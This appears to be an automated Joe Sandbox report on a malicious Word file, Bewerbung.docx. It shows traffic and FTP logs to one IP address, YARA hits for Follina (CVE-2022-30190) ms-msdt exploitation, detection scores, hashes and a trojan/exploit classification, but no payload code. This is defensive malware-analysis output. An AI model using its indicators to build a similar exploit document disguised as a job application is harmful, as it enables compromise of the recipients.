Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
Source: global traffic	TCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
Source: global traffic	TCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB

Uses FTP

Source: unknown

Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11
Source: unknown	TCP traffic detected without corresponding DNS query: 185.27.134.11

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmp

Jump to behavior

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED	Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18

Source: Bewerbung.docx	ReversingLabs: Detection: 20%
Source: Bewerbung.docx	Virustotal: Detection: 9%

Source: Bewerbung.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Bewerbung.docx

Source: Bewerbung.docx

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$werbung.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5F00.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.expl.evad.winDOCX@1/17@0/1

Source: Bewerbung.docx	OLE document summary: title field not present or empty
Source: Bewerbung.docx	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Bewerbung.docx

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

ID:	705530
Product:	CloudBasic
Start time:	15:34:12
Start date:	19.09.2022
Sample:	Bewerbung.docx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	e7521cc41970a93d81eb7db063563474
SHA1:	668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256:	d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 49.01%

Windows Analysis Report
Bewerbung.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Windows Analysis Report Bewerbung.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Windows Analysis Report
Bewerbung.docx